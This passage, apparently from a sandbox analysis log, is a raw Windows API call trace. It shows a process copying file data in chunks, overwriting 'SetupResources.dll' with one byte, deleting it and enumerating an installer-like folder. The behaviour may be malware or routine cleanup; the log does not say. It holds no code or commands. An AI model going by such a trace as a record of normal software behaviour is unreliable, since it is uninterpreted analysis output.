(dwErrCode=0x0) [0065.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0065.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0065.815] GetLastError () returned 0x0 [0065.815] SetLastError (dwErrCode=0x0) [0065.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0065.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0065.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d648 [0065.815] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0065.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0065.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0065.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0065.818] GetLastError () returned 0x0 [0065.818] SetLastError (dwErrCode=0x0) [0065.818] GetLastError () returned 0x0 [0065.818] SetLastError (dwErrCode=0x0) [0065.818] GetLastError () returned 0x0 [0065.818] SetLastError (dwErrCode=0x0) [0065.818] GetLastError () returned 0x0 [0065.818] SetLastError (dwErrCode=0x0) [0065.818] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.818] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.819] GetLastError () returned 0x0 [0065.819] SetLastError (dwErrCode=0x0) [0065.820] GetLastError () returned 0x0 [0065.820] SetLastError (dwErrCode=0x0) [0065.820] GetLastError () returned 0x0 [0065.820] SetLastError (dwErrCode=0x0) [0065.820] GetLastError () returned 0x0 [0065.820] SetLastError (dwErrCode=0x0) [0065.820] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.820] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.820] GetLastError () returned 0x0 [0065.820] SetLastError (dwErrCode=0x0) [0065.820] GetLastError () returned 0x0 [0065.820] SetLastError (dwErrCode=0x0) [0065.821] GetLastError () returned 0x0 [0065.821] SetLastError (dwErrCode=0x0) [0065.821] GetLastError () returned 0x0 [0065.821] SetLastError (dwErrCode=0x0) [0065.821] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.821] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.821] GetLastError () returned 0x0 [0065.821] SetLastError (dwErrCode=0x0) [0065.821] GetLastError () returned 0x0 [0065.821] SetLastError (dwErrCode=0x0) [0065.821] GetLastError () returned 0x0 [0065.821] SetLastError (dwErrCode=0x0) [0065.822] GetLastError () returned 0x0 [0065.822] SetLastError (dwErrCode=0x0) [0065.822] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0xb58, lpOverlapped=0x0) returned 1 [0065.822] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.822] GetLastError () returned 0x0 [0065.822] SetLastError (dwErrCode=0x0) [0065.822] GetLastError () returned 0x0 [0065.822] SetLastError (dwErrCode=0x0) [0065.822] ReadFile (in: hFile=0x420, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0065.822] GetLastError () returned 0x0 [0065.822] SetLastError (dwErrCode=0x0) [0065.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0065.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0065.823] GetLastError () returned 0x0 [0065.823] SetLastError (dwErrCode=0x0) [0065.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0065.823] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327ef70*=0xb60, lpOverlapped=0x0) returned 1 [0065.823] GetLastError () returned 0x0 [0065.823] SetLastError (dwErrCode=0x0) [0065.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0065.823] GetLastError () returned 0x0 [0065.823] SetLastError (dwErrCode=0x0) [0065.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0065.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0065.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0065.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0065.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0065.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0065.823] CloseHandle (hObject=0x428) returned 1 [0065.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d648 | out: hHeap=0x20000) returned 1 [0065.825] CloseHandle (hObject=0x420) returned 1 [0065.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0065.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0065.825] AreFileApisANSI () returned 1 [0065.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0065.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0065.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 46 [0065.825] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0065.826] GetFileType (hFile=0x420) returned 0x1 [0065.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0065.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d648 [0065.826] GetLastError () returned 0xb7 [0065.826] SetLastError (dwErrCode=0xb7) [0065.826] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0065.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d648 | out: hHeap=0x20000) returned 1 [0065.827] CloseHandle (hObject=0x420) returned 1 [0065.827] AreFileApisANSI () returned 1 [0065.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0065.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71620 [0065.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 46 [0065.828] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll")) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0065.829] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.829] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.829] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f1, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ȁ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧藐\x07̧비聐蘰\x08賂̧")) returned 0 [0065.829] FindClose (in: hFindFile=0x785d0 | out: hFindFile=0x785d0) returned 1 [0065.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0065.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0065.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0065.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0065.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0065.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0065.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0065.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0065.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0065.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0065.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0065.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0065.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0065.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0065.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0065.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0065.830] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.830] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.830] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.830] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0065.830] AreFileApisANSI () returned 1 [0065.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1033", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1033", lpUsedDefaultChar=0x0) returned 27 [0065.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0065.830] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.830] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0065.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0065.830] AreFileApisANSI () returned 1 [0065.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0065.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x783d0 [0065.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x783d0, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033") returned 27 [0065.830] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033" (normalized: "c:\\588bce7c90097ed212\\1033"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.831] GetLastError () returned 0x5 [0065.831] GetLastError () returned 0x5 [0065.831] SetLastError (dwErrCode=0x5) [0065.831] GetLastError () returned 0x5 [0065.831] SetLastError (dwErrCode=0x5) [0065.831] GetLastError () returned 0x5 [0065.831] SetLastError (dwErrCode=0x5) [0065.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x783d0 | out: hHeap=0x20000) returned 1 [0065.831] AreFileApisANSI () returned 1 [0065.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0065.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78510 [0065.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x78510, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033") returned 27 [0065.831] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033" (normalized: "c:\\588bce7c90097ed212\\1033"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.831] GetLastError () returned 0x5 [0065.831] GetLastError () returned 0x5 [0065.831] SetLastError (dwErrCode=0x5) [0065.831] GetLastError () returned 0x5 [0065.831] SetLastError (dwErrCode=0x5) [0065.831] GetLastError () returned 0x5 [0065.831] SetLastError (dwErrCode=0x5) [0065.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78510 | out: hHeap=0x20000) returned 1 [0065.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0065.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0065.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0065.831] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.831] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.831] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.831] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0065.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0065.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0065.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0065.832] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1035", cAlternateFileName="")) returned 1 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0065.832] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78090 [0065.832] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.832] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0065.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0065.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0065.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0065.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0065.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x469e8 [0065.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0065.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0065.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0065.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0065.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0065.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0065.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0065.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0065.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0065.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0065.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0065.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0065.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, 